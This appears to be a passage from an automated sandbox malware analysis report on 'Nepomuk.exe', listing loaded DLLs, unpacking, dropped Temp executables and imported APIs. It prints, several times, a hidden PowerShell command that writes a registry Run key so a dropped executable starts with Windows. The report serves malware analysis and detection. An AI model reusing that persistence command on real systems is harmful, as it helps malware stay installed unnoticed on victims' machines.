                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: Nepomuk.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    barindex
                    Detected unpacking (creates a PE file in dynamic memory)
                    Source: C:\Users\user\Desktop\Nepomuk.exeUnpacked PE file: 0.2.Nepomuk.exe.3550000.2.unpack
                    Suspicious powershell command line found
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe\" }"
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe\" }"
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe\" }"
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe\" }"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe\" }"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe\" }"Jump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF2610 CreateWindowExW,DestroyWindow,ShowWindow,ShowWindowAsync,UpdateWindow,CloseWindow,OpenIcon,BringWindowToTop,IsWindow,IsWindowVisible,IsIconic,IsZoomed,SetActiveWindow,GetActiveWindow,GetMessageW,TranslateMessage,DispatchMessageW,PostQuitMessage,PeekMessageW,WaitMessage,ReplyMessage,SendNotifyMessageW,SendMessageTimeoutW,RegisterWindowMessageW,DialogBoxParamW,CreateDialogParamW,EndDialog,GetDlgItem,SetDlgItemTextW,GetDlgItemTextW,CheckDlgButton,IsDlgButtonChecked,GetKeyState,GetAsyncKeyState,GetKeyboardState,SetKeyboardState,MapVirtualKeyW,VkKeyScanW,keybd_event,mouse_event,SetCapture,ReleaseCapture,GetCapture,SetFocus,GetFocus,SetForegroundWindow,GetForegroundWindow,BeginPaint,EndPaint,GetDC,ReleaseDC,GetWindowDC,FillRect,DrawTextW,RedrawWindow,InvalidateRect,ValidateRect,SetWindowLongW,GetWindowLongW,SetWindowPos,GetWindowPlacement,SetWindowPlacement,AdjustWindowRectEx,GetClassLongW,SetClassLongW,GetSystemMetrics,SystemParametersInfoW,ExitWindowsEx,LockWorkStation,CreateMenu,CreatePopupMenu,DestroyMenu,AppendMenuW,InsertMenuW,RemoveMenu,SetMenu,GetMenu,DrawMenuBar,TrackPopupMenu,GetSubMenu,SetCursor,GetCursor,ShowCursor,SetCaretPos,GetCaretPos,CreateCaret,DestroyCaret,SetTimer,KillTimer,GetTickCount,OpenClipboard,CloseClipboard,EmptyClipboard,SetClipboardData,GetClipboardData,IsClipboardFormatAvailable,GetParent,SetParent,GetWindow,FindWindowW,FindWindowExW,ChildWindowFromPoint,GetWindowTextW,SetWindowTextW,GetWindowRect,GetClientRect,ClientToScreen,ScreenToClient,WindowFromPoint,GetDesktopWindow,MonitorFromWindow,GetMonitorInfoW,EnumDisplayMonitors,SetWindowsHookExW,UnhookWindowsHookEx,CallNextHookEx,LoadCursorW,LoadIconW,LoadImageW,LoadStringW,LoadAcceleratorsW,LoadMenuW,MessageBoxW,MessageBoxExW,MessageBoxIndirectW,FlashWindow,FlashWindowEx,DefWindowProcW,CallWindowProcW,RegisterClassExW,UnregisterClassW,GetDpiForWindow,AdjustWindowRectExForDpi,GetTouchInputInfo,CloseTouchInputHandle,GetGestureInfo,CloseGestureInfoHandle,AnimateWindow,IsGUIThread,GetGuiResources,SwitchToThisWindow,TileWindows,CascadeWindows,WinHelpW,wsprintfW,wvsprintfW,GetModuleHandleW,GetCommandLineW,GetCurrentProcessId,GetCurrentThreadId,ExitProcess,TerminateProcess,GetVersion,GetProcessHeap,HeapValidate,GetSystemTime,GetLastError,SetLastError,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetProcessTimes,Sleep,SleepEx,GetTempPathW,CreateFileW,ReadFile,WriteFile,CloseHandle,DeleteFileW,CopyFileW,MoveFileW,GetFileSize,SetFilePointer,FlushFileBuffers,LockFile,UnlockFile,GetFileAttributesW,SetFileAttributesW,FindFirstFileW,FindNextFileW,FindClose,CreateDirectoryW,RemoveDirectoryW,GetDiskFreeSpaceW,GetDriveTypeW,CreateEventW,WaitForSingleObject,ReleaseMutex,CreateMutexW,CreateSemaphoreW,OpenEventW,WaitForMultipleObjects,SignalObjectAndWait,InitializeCriticalSection,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,TryEnterCriticalSection,GetSystemDirectoryW,GetEnvironmentVariableW,GetStartupInfoW,GetComputerNameW,GetUserNameW,GetSystemInfo,GetNative0_2_00EF2610
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0158774A push edx; iretd 0_2_0158775A
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_0358834A push edx; iretd 0_2_0358835A
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_034E7913 push 8BF07D89h; iretd 8_2_034E7918
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeFile created: C:\Users\user\AppData\Local\Temp\NrEXDJiACHo.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile created: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF2610 CreateWindowExW,DestroyWindow,ShowWindow,ShowWindowAsync,UpdateWindow,CloseWindow,OpenIcon,BringWindowToTop,IsWindow,IsWindowVisible,IsIconic,IsZoomed,SetActiveWindow,GetActiveWindow,GetMessageW,TranslateMessage,DispatchMessageW,PostQuitMessage,PeekMessageW,WaitMessage,ReplyMessage,SendNotifyMessageW,SendMessageTimeoutW,RegisterWindowMessageW,DialogBoxParamW,CreateDialogParamW,EndDialog,GetDlgItem,SetDlgItemTextW,GetDlgItemTextW,CheckDlgButton,IsDlgButtonChecked,GetKeyState,GetAsyncKeyState,GetKeyboardState,SetKeyboardState,MapVirtualKeyW,VkKeyScanW,keybd_event,mouse_event,SetCapture,ReleaseCapture,GetCapture,SetFocus,GetFocus,SetForegroundWindow,GetForegroundWindow,BeginPaint,EndPaint,GetDC,ReleaseDC,GetWindowDC,FillRect,DrawTextW,RedrawWindow,InvalidateRect,ValidateRect,SetWindowLongW,GetWindowLongW,SetWindowPos,GetWindowPlacement,SetWindowPlacement,AdjustWindowRectEx,GetClassLongW,SetClassLongW,GetSystemMetrics,SystemParametersInfoW,ExitWindowsEx,LockWorkStation,CreateMenu,CreatePopupMenu,DestroyMenu,AppendMenuW,InsertMenuW,RemoveMenu,SetMenu,GetMenu,DrawMenuBar,TrackPopupMenu,GetSubMenu,SetCursor,GetCursor,ShowCursor,SetCaretPos,GetCaretPos,CreateCaret,DestroyCaret,SetTimer,KillTimer,GetTickCount,OpenClipboard,CloseClipboard,EmptyClipboard,SetClipboardData,GetClipboardData,IsClipboardFormatAvailable,GetParent,SetParent,GetWindow,FindWindowW,FindWindowExW,ChildWindowFromPoint,GetWindowTextW,SetWindowTextW,GetWindowRect,GetClientRect,ClientToScreen,ScreenToClient,WindowFromPoint,GetDesktopWindow,MonitorFromWindow,GetMonitorInfoW,EnumDisplayMonitors,SetWindowsHookExW,UnhookWindowsHookEx,CallNextHookEx,LoadCursorW,LoadIconW,LoadImageW,LoadStringW,LoadAcceleratorsW,LoadMenuW,MessageBoxW,MessageBoxExW,MessageBoxIndirectW,FlashWindow,FlashWindowEx,DefWindowProcW,CallWindowProcW,RegisterClassExW,UnregisterClassW,GetDpiForWindow,AdjustWindowRectExForDpi,GetTouchInputInfo,CloseTouchInputHandle,GetGestureInfo,CloseGestureInfoHandle,AnimateWindow,IsGUIThread,GetGuiResources,SwitchToThisWindow,TileWindows,CascadeWindows,WinHelpW,wsprintfW,wvsprintfW,GetModuleHandleW,GetCommandLineW,GetCurrentProcessId,GetCurrentThreadId,ExitProcess,TerminateProcess,GetVersion,GetProcessHeap,HeapValidate,GetSystemTime,GetLastError,SetLastError,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetProcessTimes,Sleep,SleepEx,GetTempPathW,CreateFileW,ReadFile,WriteFile,CloseHandle,DeleteFileW,CopyFileW,MoveFileW,GetFileSize,SetFilePointer,FlushFileBuffers,LockFile,UnlockFile,GetFileAttributesW,SetFileAttributesW,FindFirstFileW,FindNextFileW,FindClose,CreateDirectoryW,RemoveDirectoryW,GetDiskFreeSpaceW,GetDriveTypeW,CreateEventW,WaitForSingleObject,ReleaseMutex,CreateMutexW,CreateSemaphoreW,OpenEventW,WaitForMultipleObjects,SignalObjectAndWait,InitializeCriticalSection,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,TryEnterCriticalSection,GetSystemDirectoryW,GetEnvironmentVariableW,GetStartupInfoW,GetComputerNameW,GetUserNameW,GetSystemInfo,GetNative0_2_00EF2610
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AppJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AppJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF2610 CreateWindowExW,DestroyWindow,ShowWindow,ShowWindowAsync,UpdateWindow,CloseWindow,OpenIcon,BringWindowToTop,IsWindow,IsWindowVisible,IsIconic,IsZoomed,SetActiveWindow,GetActiveWindow,GetMessageW,TranslateMessage,DispatchMessageW,PostQuitMessage,PeekMessageW,WaitMessage,ReplyMessage,SendNotifyMessageW,SendMessageTimeoutW,RegisterWindowMessageW,DialogBoxParamW,CreateDialogParamW,EndDialog,GetDlgItem,SetDlgItemTextW,GetDlgItemTextW,CheckDlgButton,IsDlgButtonChecked,GetKeyState,GetAsyncKeyState,GetKeyboardState,SetKeyboardState,MapVirtualKeyW,VkKeyScanW,keybd_event,mouse_event,SetCapture,ReleaseCapture,GetCapture,SetFocus,GetFocus,SetForegroundWindow,GetForegroundWindow,BeginPaint,EndPaint,GetDC,ReleaseDC,GetWindowDC,FillRect,DrawTextW,RedrawWindow,InvalidateRect,ValidateRect,SetWindowLongW,GetWindowLongW,SetWindowPos,GetWindowPlacement,SetWindowPlacement,AdjustWindowRectEx,GetClassLongW,SetClassLongW,GetSystemMetrics,SystemParametersInfoW,ExitWindowsEx,LockWorkStation,CreateMenu,CreatePopupMenu,DestroyMenu,AppendMenuW,InsertMenuW,RemoveMenu,SetMenu,GetMenu,DrawMenuBar,TrackPopupMenu,GetSubMenu,SetCursor,GetCursor,ShowCursor,SetCaretPos,GetCaretPos,CreateCaret,DestroyCaret,SetTimer,KillTimer,GetTickCount,OpenClipboard,CloseClipboard,EmptyClipboard,SetClipboardData,GetClipboardData,IsClipboardFormatAvailable,GetParent,SetParent,GetWindow,FindWindowW,FindWindowExW,ChildWindowFromPoint,GetWindowTextW,SetWindowTextW,GetWindowRect,GetClientRect,ClientToScreen,ScreenToClient,WindowFromPoint,GetDesktopWindow,MonitorFromWindow,GetMonitorInfoW,EnumDisplayMonitors,SetWindowsHookExW,UnhookWindowsHookEx,CallNextHookEx,LoadCursorW,LoadIconW,LoadImageW,LoadStringW,LoadAcceleratorsW,LoadMenuW,MessageBoxW,MessageBoxExW,MessageBoxIndirectW,FlashWindow,FlashWindowEx,DefWindowProcW,CallWindowProcW,RegisterClassExW,UnregisterClassW,GetDpiForWindow,AdjustWindowRectExForDpi,GetTouchInputInfo,CloseTouchInputHandle,GetGestureInfo,CloseGestureInfoHandle,AnimateWindow,IsGUIThread,GetGuiResources,SwitchToThisWindow,TileWindows,CascadeWindows,WinHelpW,wsprintfW,wvsprintfW,GetModuleHandleW,GetCommandLineW,GetCurrentProcessId,GetCurrentThreadId,ExitProcess,TerminateProcess,GetVersion,GetProcessHeap,HeapValidate,GetSystemTime,GetLastError,SetLastError,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetProcessTimes,Sleep,SleepEx,GetTempPathW,CreateFileW,ReadFile,WriteFile,CloseHandle,DeleteFileW,CopyFileW,MoveFileW,GetFileSize,SetFilePointer,FlushFileBuffers,LockFile,UnlockFile,GetFileAttributesW,SetFileAttributesW,FindFirstFileW,FindNextFileW,FindClose,CreateDirectoryW,RemoveDirectoryW,GetDiskFreeSpaceW,GetDriveTypeW,CreateEventW,WaitForSingleObject,ReleaseMutex,CreateMutexW,CreateSemaphoreW,OpenEventW,WaitForMultipleObjects,SignalObjectAndWait,InitializeCriticalSection,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,TryEnterCriticalSection,GetSystemDirectoryW,GetEnvironmentVariableW,GetStartupInfoW,GetComputerNameW,GetUserNameW,GetSystemInfo,GetNative0_2_00EF2610
                    Source: C:\Users\user\Desktop\Nepomuk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
